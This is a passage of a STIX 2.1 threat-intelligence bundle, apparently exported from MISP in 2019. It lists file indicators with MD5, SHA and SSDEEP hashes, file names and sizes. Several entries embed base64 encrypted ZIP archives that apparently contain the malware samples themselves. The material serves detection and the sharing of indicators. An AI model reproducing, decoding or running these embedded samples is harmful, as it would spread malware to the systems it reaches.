BXRVdNBjrUeawDoSGc/sqM06rqQX8aA6G7IRvV9bDklfLsElLy0oQP5quN3AlcVoYcqZzwu6m60QGvwXkHSG7C/JxVJT3Lw3v2AupVEv+68nDEsAb+SeFIjACWQoBYUpY4bGL23blSwQ9gIa7Bt/RL2A75DLJdmYOxdVQpWMM1ivgxkFVz7fS3P+Xym86jrderW3WUbgMPBvP6kUrWwczgeMI4y0nRBXblKO7OSY5vwImSw2kBaPFr/m+Br+hDmsSiaLR+gz8WkBpBm6sxYb+ZRTJ3pgb37vjDqv8xC+E+Gi7+GXKsbO5O0NqYypmLCjqZE/VkYCQfZNpwCGOuzDU/asE7Wl8VySD+LrGa+7Zbfr4/qwETibIxx0EcI7G/e8HJP7WlNuFuEKVBlnpu1ZY4ffeuWwI9C40c5/54EWCSQz5HpbbB0UJRgHhnwdK+vuIsndr8TEawzNP+Z0uxdT8kdECsjYqGI2EEon27q1fmxMSmv8rF5gAcx4OwQ+I9bmeExijCm0bzeimCqHrjNGgIZ6AXaG7Hvdv52w7HB/PcgPLgPXH26dgD6VuvBBMks4c9cChvdazL66zxAvvrTDZmbTOwqI3FsGz2+20MTzgacfgYlZcIBJMBipCbavoo1sh0YAZUdQGobRFmLHI2vboI0CLcXZ+S7grbDFa+8eE7hYsDJVKrCNW7LlMmJCGFmUBQpp3gKZWr/l1PrUoSIMlQzdZbqEYgYcLnmyGWnMYZJ1urLQPALN8cyL/3fZaioJSbUBTm91qzyzjutvqdNv9TEB16oQ4VtsYRDnsNWW1+MivOLakITTHgbgDzAg0vSSwo0FBwT6ECZtZjrJ2FOoMBfIS6PYzWINvpnb6CC70S7W2nvw2qtWPF+FF/j9Rqe1zidNlmvRZ5vuTIWagg0f00yssViwS/ytRV7bY+Zu/2LelzJG4AlDq2c7MGh/enQ/WqRhVYkmcBI/f6jnSiEvPjGj1dB6qClpy1iAK4EvkKAExPern+LD8So7z43hcxMs6pZxMV6+ePrfyOPi7yqQhyZ+3Vapydifx7Zd++jjCU0DbOytpJgBexGmkFNpIP9zw8BinRa8W58CuGwNLlzrzA0rJJsrlpl7J2FxFopKMc29IYbX2Xyns0WaC79t69zU3BIZuodqCT8tjQSZ+Gqkin1Ke7m3s7CRmjlmqv04vRIwGyh96007odEeCOjciEAFfJKloHqAn1mHziLKlTGkn1PJ8CaLUhDxUWMG59JInq4Eb6yZz/zFRiIph27oKVpAR+V13irT7LT7aZxpUX6B2k79H/nF092I7OIm5/ophR4q8gNgNa4hkKkcX2AhXjHdEeisr5s8dYlGVlsavJpKRjkmOJDfwoX2H5fXHuDrrQ1Nwand8878wkcKzH6erf6rHVSNZFsqjr4Z9ghpq35Cty6hdBjCnAf4AKpClXZrvAG50gG22PhAspAkA1Ou1GsiyWatQOvgM8FzpkBs+1ki1ie1ihp27gwnvSs8jgPQO6Qy1NvXBsodBSL5W6aKTBencXZPCAbB9nRoAWO4CqBXMGMTMSNnS6JdCqnEnH1XUOQMJYqQ5FjvZQbffHsbukKXCRY4gbnT+Y7qfesb7t/YyLeUgatbRXEnBd9YsFba8FXFPQ+gOy9eZovH55IBUl9UOHgILri9gL1kb/ze8g+upwqEgj/QS3qsDQFU69vCyBLn7jppRCwns0ppX+9tmFs9pcFdyvQo5o7L+5qAHo0gi77JTQByHVrsqLb5Kq/WC4/lnC17u9f+yL4p8t1+VrpdCc4BHaKKriAuwcxb41QaIowNpVGrLPIm8LvohuKszGrPx/DO0ESVm5dHjG0s3GFiaElk/XUOzuZhPWhhsl8drdskOJIWIls5+sbIA38XqLWKMQsufBVqCD2NaMHReFQ3rv5Vrfq9m7QcDgqTTPl4ZlhTwrHmWMl/mG2JWZeVOf98bY0jNJH3EW2b8QxEQjm6/AKSYqchLo4Dm+6tjBhjds81s6xClQ6PBl+s64uUcdzg02EAWq8oJEs4+b9xFlubxEGN2Kg0RVDRBq3k6eVmHY2te/vP0x9WW5ea7ZoK+QI5zescs97081xwYs9QHv7HIJ3
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:29:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9608228e-4373-44ac-9fdd-bd37d5b02275",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:48:55.000Z",
"modified": "2019-05-16T13:48:55.000Z",
"pattern": "[file:hashes.MD5 = '08b49fb9882bfc8f69beb594fa543c8a' AND file:hashes.SHA1 = '201e85d6bc519ecc6dece75b2586e761a56db6a7' AND file:hashes.SHA256 = 'ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73' AND file:hashes.SHA512 = 'b4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8' AND file:hashes.SSDEEP = '6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1' AND file:name = 'ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73' AND file:size = '252891' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:48:55Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:45:09.000Z",
"modified": "2019-05-16T13:45:09.000Z",
"pattern": "[file:hashes.MD5 = '1baa024f9cfab48b92c297aa406c91b5' AND file:hashes.SHA1 = '7d5a1dc90d535e3cc552d0db02841d28fb1ae773' AND file:hashes.SHA256 = '0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132' AND file:hashes.SHA512 = '4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416' AND file:hashes.SSDEEP = '12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM' AND file:name = '0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132' AND file:size = '447466' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:45:09Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--06a84b03-0560-46ae-8570-1e7072a0b400",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:46:44.000Z",
"modified": "2019-05-16T13:46:44.000Z",
"pattern": "[file:hashes.MD5 = 'da877f4f7335264b03ac72fca5b305dc' AND file:hashes.SHA1 = '435aa871cdd772072390d9baceaa8d832208d710' AND file:hashes.SHA256 = 'c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2' AND file:hashes.SHA512 = '6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd' AND file:hashes.SSDEEP = '3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7' AND file:name = 'c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2' AND file:size = '156088' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAJlisE6wqwo+zTECALhhAgAgABwAZGE4NzdmNGY3MzM1MjY0YjAzYWM3MmZjYTViMzA1ZGNVVAkAA4I53VyCOd1cdXgLAAEEIQAAAAQhAAAAKrdC+5FIS7uu58mNvfp+SFObttGCkG2OSotdGeZyPKAeIMNKC7fSK3/ohJv9sam00qfMFkYvUf6AuKgFGbj/rd69CAeXUFNT9Slq1Ko3ZZoiXf7SYGY5e/ryz1Mo0nu4RSHhEIIDXwpnWuLIri1dum+NZvFuV0Y0++WwygCJ5Wu4FGDY0uRFgygsyuqn9oZkImkeZYKuEiNPzid95AkG07A6z0SVWoZkO+mf3sofxp/9uMzCFsaxTkzhIwW7eCT2t1r6tflFo0nmYcpccj++/YVyrdanmo/9ads5y8UxmaYklvK1pYIk+DPabOLyVhie8P2BBfLNguZtHNSYoWlDTfxhO4xXs021pkhMeNsxe7BkCwsvlxPXmY0I9sj3bbID4uFuz3ERbdUuDRqcxlJR4qO2riSkKG4+C+bOAmzu8NI6r+XQ4ajCYHVj6wDbD8QrgmT/HlvhhVKzpri1aBVxAgIkj+hQmg5mCE29lQKGkr1dG4m9L4GPy+JqZiP0UCrjm8n0vPDHptd4+GwWrBzPDh4m/FdIsSh+EvB99nPDhxSj21+JfBdvRC5lPV4MV7AN318BgwxStW+9iVyvYvDMhksGgu/0LERQFA2c5OjWIbwKz6JRjxD0o0oLfbftFaa4Szg64dTa1WOqrREdvCgt80xUjXJKMKO+p1+H2S4CQhQlParrOsAif9T8oXZLOLqzX1FA71OXb9oOH2yLOqZ/x5d5USGP0ksqe/8K7/8O4LUM3MltFDu93cxFtRXbSinBvzzFJ6LaposRMb94JZHQuB+Y69DCWXVzmvU9Zu5UiIkEbUWNYHNopRKVpEZSAFN9mbYXT0o9YKW6G48eRkrxWbI9xKNF8zcDX5PTmHEluNhAxx3TTX2MNrtYww2tIqpBiu7DMvHdJsS4xFtMMZHhKK7Q0xuyWehBfynqCJAKR0n0up+vACy6S45Lupv2leuESGJAgWqsIHPnI5L/ILNihuGMCprh79zsuA7gaWp+A41hIC2CRHkeTx+bpwXpBurShCK4KroPlUCrYgqdQjbqUadHGKUuebdAePV7J8lG1yvXh0d6TbTT/MzUhVLm5wf4qgE7q7qWWMM60GwRHFO2NnX/v3ULB3az1SsfNh6CX6wnunpiWO7rOof2z3zv6VERnNk52E52pFYvXyZpRZ8CeLgMadkCqgldtv72t+zzAoF+s2KZCBd9QrJGcH7j1JCh6D6cFIdaUA0cCLXNhxUAK1xzKbQ6U7LwpIoSEJ91UPCj9d6kRwQE5H9Iec68+c8lwRWFTfPxCndOLboYYLf8L+yiIb/EBus7f55/jl7rW+QV+MlWtLAfwCmfirsa8qyI2mVS9EVPq5+nOqfoqH4Xmol8leAYWBs9gicd/08d1MbUo0KZD1o1X9McU95kl+gOMG8FjM7EjyPXZNDaykwqt+jNjRR6ko7O/j7F4v0yTUDIBkO8qxhv97jEyk/CDMvF8sL6mXba6Xd/BODg5+ZnC+OdkAoetLmPyv0qOCtstK1TUXbAChGAhFagbHckuBj/YUgoBbwoma2aEmj0pLnmy2C0xqx0U1zv5l/K0QKCWbwF9sfwafN1QJyE8JXQdceUQJNbZp8edCVcQ39QaWq2RLNjk77SqRtlSIWlPRvZ5TbxJ1mbYQhCqTQXHDZFbtvmdWqIAOXRK0jKbuXQ4c+d9Rt0Wg0y0gzzhtPbdPpO2FMroRYPwRm5LQIIr74Fu05HxOJFCd+KffqFtn+G75wF6I2PQ2gaV+vt4LGPfhzarX4uyuiTnm6PpvGb7kkOxFgWiWJ2R5cCavAhvBiWJRL2Cur5QGMAAP46RJXo1jDDnY3Cb6C7ZtRMGhGtzFHpCuDWex2c2lqILLGQHIP0aqVlbnr7ymE9q6axMDVUceN1eVxQ/qeIVXQflk3UvEL7VRebbh2KB83WxcA3EHjvOC3Tds8fm0W1hGRlcoSGdYLBiyivV55FOvOJY2ZVBNYpJQoZUJdv2OuAqv/IQk4NQRpGWuHZ/kmoIj6NjsouUpDVl35WqbSKbxirLs0urwHL8tMchKZWg3RWnPTSn36zBUdo+lynCoz9QivdDMcsUlUgNW/0a/JdAZ2+B5AIXs5cdIGm5XJo2UfH3CnurPIDtQ7XKQAo6zZClRht3jNCYd3kMVnR374flUVY3ZApl6IIbHUbi52zvnQt1K3FrDe4ecrTvgFSKEPSgEuyAPt+CmNySboTycKuTacL9DezONI9KK+6shX0Ki1Bz4b7i2OHZKUknuDmykom0L+df/1uwTyW3382OC9Px08u6z1cTPG4zhy1Mr6d/oV728yq1kggUhgxpptmbP6AxlGB65d4Uk3IfFi8G28E5rjCv34b4Yvwe7vA6V1VTAFhnbu1sy/KDN9Ax6Mx4+Av/3wz5MPx94T+pPwsNvMDtucvM2zKDm5eqIGN8XoBsZCfFHa1vt4mC2HIUSD+30P/4fMQZfDFlATbp5+KrAfCU0z0s+zYHAIfYr5/4gfddBEH8H1Qyt1rh2JnPbBEMLMa/9kZglwhFQksbt9PREHyLi+wmp+aleL33HMO1aYGORSTpcjcGoETB9QjpQIJ0MerD586i/saUJpAOOCGj3ZmmFOwYsUe8Ua60lNawtCComU/ZQqWI5nO4jvaXPuVPM4b8htjREJrSFlSNZHuSi1fxTQyhG/0l/egWNcGFc/19D3lljjjuvd9/EUeY4SQvUXVxHlGJI2xq4mhy8+A/gNm/VuZKhtNkYlrfrymXuVWYRIRYUo1k/x+nShD6s6Q9dccJDUD3Rz9FbxlP6kXDMEMTYSeWRiLArd0kxHPtwAhP5Qc8fdd2aFpGPW1mnIlN798jOOOv7EOkvpdDxNfPvaEKHTgESHIHPLJKKxcapFOr/U4TsUdqyDpuyzZZqGt73FanS1fIcsUZucZIszW0SDS5KBwvopoGzmRJiXvzQEuji+4sRdF8uEPMiXgzFftLIwqANqQiBZf9iYHCjV+uzBKg2gXccYswWxb+4sib0jZqB3e+Yl7847t3vWG6G1waeHlaoxTd5UkGwRJD3D3W4eGXY21IGljEgrGQm12U9S4i5AoH4ewc5ONGAj52sGMxNUd3RlbmJmugwDRc+Wfe8uELQgXBsJklaJnZYPinPatA3NxwjZIB1gSEhQw3nS8MyIr97GWzkuO/z6ZjhcZypPZe0+Q4Dhp+K9sDzU4f/0Yp/NDhqKAamvq+J/QtW3N+Afb9TanxiG+C9awHhZQO6xgucJ5lGm12s0eoQFgu/jxg8/nXc37j1gKPiI6+ekRxWy/aJnnpKUAXact+S3izlIgou6wLPQ3CNz+fKhEvEiRAXxdu5mM
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:46:44Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--453258ef-0925-4471-9dcc-a06ab8038664",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:48:15.000Z",
"modified": "2019-05-16T13:48:15.000Z",
"pattern": "[file:hashes.MD5 = 'b830fd2997e1f124f34d77ff1fa9b89e' AND file:hashes.SHA1 = 'ea43350c37e0c266c12d0fd53643cf94dd58c1f7' AND file:hashes.SHA256 = 'f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a' AND file:hashes.SHA512 = '24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1' AND file:hashes.SSDEEP = '12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV' AND file:name = 'f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a' AND file:size = '485888' AND (file:content_ref.payload_bin = 